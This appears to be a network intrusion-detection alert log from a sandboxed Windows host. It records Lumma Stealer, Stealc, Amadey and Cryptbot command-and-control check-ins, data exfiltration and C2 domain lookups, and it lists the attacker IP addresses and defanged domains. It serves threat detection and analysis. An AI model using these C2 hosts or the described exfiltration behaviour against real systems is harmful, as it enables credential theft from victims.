2024-12-22T02:19:08.412953+0100	2028371	3	Unknown Traffic	192.168.2.4	50284	104.21.89.115	443	TCP
2024-12-22T02:19:08.699676+0100	2028371	3	Unknown Traffic	192.168.2.4	50286	104.21.67.146	443	TCP
2024-12-22T02:19:08.740055+0100	2028371	3	Unknown Traffic	192.168.2.4	50287	104.21.21.99	443	TCP
2024-12-22T02:19:10.971606+0100	2028371	3	Unknown Traffic	192.168.2.4	50292	104.21.67.146	443	TCP
2024-12-22T02:19:13.258407+0100	2028371	3	Unknown Traffic	192.168.2.4	50298	104.21.89.115	443	TCP
2024-12-22T02:19:13.712201+0100	2028371	3	Unknown Traffic	192.168.2.4	50299	104.21.67.146	443	TCP
2024-12-22T02:19:17.756437+0100	2028371	3	Unknown Traffic	192.168.2.4	50304	104.21.67.146	443	TCP
2024-12-22T02:21:34.966397+0100	2028371	3	Unknown Traffic	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:21:36.960526+0100	2028371	3	Unknown Traffic	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:21:39.594134+0100	2028371	3	Unknown Traffic	192.168.2.4	50523	172.67.209.202	443	TCP
2024-12-22T02:21:41.997027+0100	2028371	3	Unknown Traffic	192.168.2.4	50526	172.67.209.202	443	TCP
2024-12-22T02:21:44.206069+0100	2028371	3	Unknown Traffic	192.168.2.4	50527	172.67.209.202	443	TCP
2024-12-22T02:21:46.956179+0100	2028371	3	Unknown Traffic	192.168.2.4	50533	172.67.209.202	443	TCP
2024-12-22T02:21:49.582086+0100	2028371	3	Unknown Traffic	192.168.2.4	50541	172.67.209.202	443	TCP
2024-12-22T02:21:51.742096+0100	2028371	3	Unknown Traffic	192.168.2.4	50544	172.67.209.202	443	TCP
2024-12-22T02:23:01.348439+0100	2028371	3	Unknown Traffic	192.168.2.4	50614	104.21.89.115	443	TCP
2024-12-22T02:23:03.386494+0100	2028371	3	Unknown Traffic	192.168.2.4	50616	104.21.89.115	443	TCP
2024-12-22T02:23:05.657501+0100	2028371	3	Unknown Traffic	192.168.2.4	50618	104.21.89.115	443	TCP
2024-12-22T02:23:07.823180+0100	2028371	3	Unknown Traffic	192.168.2.4	50622	104.21.89.115	443	TCP
2024-12-22T02:23:10.352798+0100	2028371	3	Unknown Traffic	192.168.2.4	50624	104.21.89.115	443	TCP
2024-12-22T02:23:12.541103+0100	2028371	3	Unknown Traffic	192.168.2.4	50633	104.21.89.115	443	TCP
2024-12-22T02:23:14.735602+0100	2028371	3	Unknown Traffic	192.168.2.4	50636	104.21.89.115	443	TCP
2024-12-22T02:23:16.932736+0100	2028371	3	Unknown Traffic	192.168.2.4	50639	104.21.89.115	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:29.867508+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:32.377836+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:36.162646+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49823	104.21.67.146	443	TCP
2024-12-22T02:16:38.219742+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49831	104.21.67.146	443	TCP
2024-12-22T02:16:51.740330+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49875	172.67.209.202	443	TCP
2024-12-22T02:16:58.461627+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49897	104.21.67.146	443	TCP
2024-12-22T02:17:54.744267+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:17:59.189888+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:18:12.264243+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:14.500972+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:41.650873+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50174	104.21.21.99	443	TCP
2024-12-22T02:18:45.568691+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:47.900850+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50185	104.21.89.115	443	TCP
2024-12-22T02:18:48.034298+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:48.068143+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50186	104.21.21.99	443	TCP
2024-12-22T02:18:50.417360+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50205	104.21.89.115	443	TCP
2024-12-22T02:18:54.885994+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50240	104.21.67.146	443	TCP
2024-12-22T02:18:57.308338+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50247	104.21.67.146	443	TCP
2024-12-22T02:19:09.526983+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50287	104.21.21.99	443	TCP
2024-12-22T02:19:14.023689+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50298	104.21.89.115	443	TCP
2024-12-22T02:19:18.795844+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50304	104.21.67.146	443	TCP
2024-12-22T02:21:35.728718+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:21:37.739791+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:21:52.503723+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50544	172.67.209.202	443	TCP
2024-12-22T02:23:02.125625+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50614	104.21.89.115	443	TCP
2024-12-22T02:23:04.162121+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50616	104.21.89.115	443	TCP
2024-12-22T02:23:17.711754+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50639	104.21.89.115	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:29.867508+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:36.162646+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49823	104.21.67.146	443	TCP
2024-12-22T02:17:54.744267+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:18:12.264243+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:45.568691+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:47.900850+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50185	104.21.89.115	443	TCP
2024-12-22T02:18:54.885994+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50240	104.21.67.146	443	TCP
2024-12-22T02:21:35.728718+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:23:02.125625+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50614	104.21.89.115	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:32.377836+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:38.219742+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49831	104.21.67.146	443	TCP
2024-12-22T02:17:59.189888+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:18:14.500972+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:48.034298+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:50.417360+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50205	104.21.89.115	443	TCP
2024-12-22T02:18:57.308338+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50247	104.21.67.146	443	TCP
2024-12-22T02:21:37.739791+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:23:04.162121+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50616	104.21.89.115	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:17:53.710812+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:17:56.390951+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:18:11.249239+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:13.327037+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50125	104.21.21.99	443	TCP
2024-12-22T02:18:13.727782+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:15.853049+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50134	104.21.21.99	443	TCP
2024-12-22T02:18:19.112536+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50140	104.21.21.99	443	TCP
2024-12-22T02:18:20.871417+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50141	104.21.21.99	443	TCP
2024-12-22T02:18:26.676005+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50157	104.21.21.99	443	TCP
2024-12-22T02:18:27.288592+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50158	104.21.21.99	443	TCP
2024-12-22T02:18:31.148526+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50162	104.21.21.99	443	TCP
2024-12-22T02:18:35.225117+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50168	104.21.21.99	443	TCP
2024-12-22T02:18:35.564629+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50169	104.21.21.99	443	TCP
2024-12-22T02:18:40.872079+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50174	104.21.21.99	443	TCP
2024-12-22T02:18:42.523962+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50177	104.21.21.99	443	TCP
2024-12-22T02:18:44.392432+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:47.155471+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50186	104.21.21.99	443	TCP
2024-12-22T02:18:47.244318+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:51.583167+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50222	104.21.21.99	443	TCP
2024-12-22T02:18:54.202297+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50238	104.21.21.99	443	TCP
2024-12-22T02:18:56.513771+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50246	104.21.21.99	443	TCP
2024-12-22T02:18:59.069531+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50253	104.21.21.99	443	TCP
2024-12-22T02:19:05.778609+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50276	104.21.21.99	443	TCP
2024-12-22T02:19:08.740055+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.4	50287	104.21.21.99	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:29.118059+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:31.600922+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:35.270547+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49822	172.67.209.202	443	TCP
2024-12-22T02:16:37.742476+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49832	172.67.209.202	443	TCP
2024-12-22T02:16:40.187887+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49837	172.67.209.202	443	TCP
2024-12-22T02:16:42.967084+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49843	172.67.209.202	443	TCP
2024-12-22T02:16:45.744612+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49858	172.67.209.202	443	TCP
2024-12-22T02:16:50.956303+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	49875	172.67.209.202	443	TCP
2024-12-22T02:21:34.966397+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:21:36.960526+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:21:39.594134+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50523	172.67.209.202	443	TCP
2024-12-22T02:21:41.997027+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50526	172.67.209.202	443	TCP
2024-12-22T02:21:44.206069+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50527	172.67.209.202	443	TCP
2024-12-22T02:21:46.956179+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50533	172.67.209.202	443	TCP
2024-12-22T02:21:49.582086+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50541	172.67.209.202	443	TCP
2024-12-22T02:21:51.742096+0100	2058398	1	Domain Observed Used for C2 Detected	192.168.2.4	50544	172.67.209.202	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:43.359656+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50178	185.215.113.16	80	TCP
2024-12-22T02:18:49.630549+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50203	185.215.113.16	80	TCP
2024-12-22T02:19:10.985979+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	50291	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:20.050715+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49785	185.215.113.43	80	TCP
2024-12-22T02:16:27.157819+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49802	185.215.113.43	80	TCP
2024-12-22T02:16:35.972597+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49824	185.215.113.43	80	TCP
2024-12-22T02:16:42.400597+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49842	185.215.113.43	80	TCP
2024-12-22T02:16:49.044371+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49865	185.215.113.43	80	TCP
2024-12-22T02:17:01.316285+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49906	185.215.113.43	80	TCP
2024-12-22T02:17:13.860156+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49942	185.215.113.43	80	TCP
2024-12-22T02:17:26.991253+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49978	185.215.113.43	80	TCP
2024-12-22T02:17:36.074423+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49997	185.215.113.43	80	TCP
2024-12-22T02:17:44.671627+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50024	185.215.113.43	80	TCP
2024-12-22T02:17:55.833608+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50061	185.215.113.43	80	TCP
2024-12-22T02:18:04.224431+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50089	185.215.113.43	80	TCP
2024-12-22T02:18:15.274222+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50129	185.215.113.43	80	TCP
2024-12-22T02:18:54.437305+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50233	185.215.113.43	80	TCP
2024-12-22T02:21:21.319108+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50501	185.215.113.43	80	TCP
2024-12-22T02:21:32.795375+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50509	185.215.113.43	80	TCP
2024-12-22T02:22:20.898558+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50571	185.215.113.43	80	TCP
2024-12-22T02:22:57.055457+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50608	185.215.113.43	80	TCP

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:17:38.683428+0100	2054350	1	A Network Trojan was detected	192.168.2.4	50005	185.121.15.192	80	TCP
2024-12-22T02:17:40.574994+0100	2054350	1	A Network Trojan was detected	192.168.2.4	50016	185.121.15.192	80	TCP
2024-12-22T02:18:24.407639+0100	2054350	1	A Network Trojan was detected	192.168.2.4	50144	185.121.15.192	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:17:52.164628+0100	2058360	1	Domain Observed Used for C2 Detected	192.168.2.4	53998	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:17:51.632273+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.4	65072	1.1.1.1	53	UDP
2024-12-22T02:18:09.812504+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.4	49839	1.1.1.1	53	UDP
2024-12-22T02:18:42.810886+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.4	52072	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:27.549091+0100	2058397	1	Domain Observed Used for C2 Detected	192.168.2.4	57173	1.1.1.1	53	UDP
2024-12-22T02:21:33.495571+0100	2058397	1	Domain Observed Used for C2 Detected	192.168.2.4	56639	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:17:50.734247+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.4	61253	1.1.1.1	53	UDP
2024-12-22T02:18:09.608650+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.4	60789	1.1.1.1	53	UDP
2024-12-22T02:18:42.555707+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.4	64282	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:13.123701+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	50121	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:12.967736+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	50121	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:13.443362+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	50121	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:15.340948+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	50121	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:13.931765+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	50121	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:36.418896+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49822	172.67.209.202	443	TCP
2024-12-22T02:16:46.656890+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49852	104.21.67.146	443	TCP
2024-12-22T02:18:21.671674+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50141	104.21.21.99	443	TCP
2024-12-22T02:18:52.550863+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50222	104.21.21.99	443	TCP
2024-12-22T02:18:58.413276+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50250	104.21.89.115	443	TCP
2024-12-22T02:19:04.170244+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50264	104.21.67.146	443	TCP
2024-12-22T02:21:42.902536+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50526	172.67.209.202	443	TCP
2024-12-22T02:23:13.308374+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50633	104.21.89.115	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:12.442007+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50121	185.215.113.206	80	TCP
2024-12-22T02:19:09.972691+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50288	185.215.113.206	80	TCP
2024-12-22T02:19:16.361190+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50302	185.215.113.206	80	TCP
2024-12-22T02:19:23.289904+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50325	185.215.113.206	80	TCP
2024-12-22T02:19:30.539459+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50357	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:07.338429+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49753	185.215.113.43	80	TCP
2024-12-22T02:21:16.862732+0100	2856147	1	A Network Trojan was detected	192.168.2.4	50498	212.193.31.8	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:49.288084+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49866	212.193.31.8	80	TCP
2024-12-22T02:16:55.433332+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49890	212.193.31.8	80	TCP
2024-12-22T02:17:01.499458+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49907	212.193.31.8	80	TCP
2024-12-22T02:17:07.846728+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49925	212.193.31.8	80	TCP
2024-12-22T02:17:13.976404+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49945	212.193.31.8	80	TCP
2024-12-22T02:17:20.238998+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49960	212.193.31.8	80	TCP
2024-12-22T02:17:26.611114+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49974	212.193.31.8	80	TCP
2024-12-22T02:17:33.198289+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49991	212.193.31.8	80	TCP
2024-12-22T02:17:39.353977+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50011	212.193.31.8	80	TCP
2024-12-22T02:17:45.817182+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50025	212.193.31.8	80	TCP
2024-12-22T02:17:53.064208+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50051	212.193.31.8	80	TCP
2024-12-22T02:17:59.422173+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50078	212.193.31.8	80	TCP
2024-12-22T02:18:06.202323+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50097	212.193.31.8	80	TCP
2024-12-22T02:18:12.786767+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50124	212.193.31.8	80	TCP
2024-12-22T02:18:18.929899+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50139	212.193.31.8	80	TCP
2024-12-22T02:18:25.476403+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50153	212.193.31.8	80	TCP
2024-12-22T02:18:32.076457+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50165	212.193.31.8	80	TCP
2024-12-22T02:18:38.307122+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50171	212.193.31.8	80	TCP
2024-12-22T02:18:45.247121+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50181	212.193.31.8	80	TCP
2024-12-22T02:18:51.845973+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50223	212.193.31.8	80	TCP
2024-12-22T02:18:58.504689+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50252	212.193.31.8	80	TCP
2024-12-22T02:19:05.019592+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50269	212.193.31.8	80	TCP
2024-12-22T02:19:12.013779+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50295	212.193.31.8	80	TCP
2024-12-22T02:19:18.107488+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50306	212.193.31.8	80	TCP
2024-12-22T02:19:24.372914+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50339	212.193.31.8	80	TCP
2024-12-22T02:19:30.427962+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50358	212.193.31.8	80	TCP
2024-12-22T02:19:36.491350+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50366	212.193.31.8	80	TCP
2024-12-22T02:19:42.735546+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50372	212.193.31.8	80	TCP
2024-12-22T02:19:48.787598+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50386	212.193.31.8	80	TCP
2024-12-22T02:19:54.809650+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50402	212.193.31.8	80	TCP
2024-12-22T02:20:00.842641+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50406	212.193.31.8	80	TCP
2024-12-22T02:20:06.879631+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50412	212.193.31.8	80	TCP
2024-12-22T02:20:12.916411+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50416	212.193.31.8	80	TCP
2024-12-22T02:20:19.013424+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50428	212.193.31.8	80	TCP
2024-12-22T02:20:25.065544+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50435	212.193.31.8	80	TCP
2024-12-22T02:20:31.444346+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50447	212.193.31.8	80	TCP
2024-12-22T02:20:37.472580+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50451	212.193.31.8	80	TCP
2024-12-22T02:20:43.538037+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50455	212.193.31.8	80	TCP
2024-12-22T02:20:49.577276+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50460	212.193.31.8	80	TCP
2024-12-22T02:20:55.616587+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50472	212.193.31.8	80	TCP
2024-12-22T02:21:01.671951+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50476	212.193.31.8	80	TCP
2024-12-22T02:21:07.721338+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50489	212.193.31.8	80	TCP
2024-12-22T02:21:13.780895+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50496	212.193.31.8	80	TCP
2024-12-22T02:21:19.849771+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50500	212.193.31.8	80	TCP
2024-12-22T02:21:25.987851+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50504	212.193.31.8	80	TCP
2024-12-22T02:21:32.143982+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50508	212.193.31.8	80	TCP
2024-12-22T02:21:38.319056+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50521	212.193.31.8	80	TCP
2024-12-22T02:21:44.448509+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50528	212.193.31.8	80	TCP
2024-12-22T02:21:50.569457+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50542	212.193.31.8	80	TCP
2024-12-22T02:21:56.661111+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50547	212.193.31.8	80	TCP
2024-12-22T02:22:02.827085+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50558	212.193.31.8	80	TCP
2024-12-22T02:22:08.898113+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50562	212.193.31.8	80	TCP
2024-12-22T02:22:14.962769+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50567	212.193.31.8	80	TCP
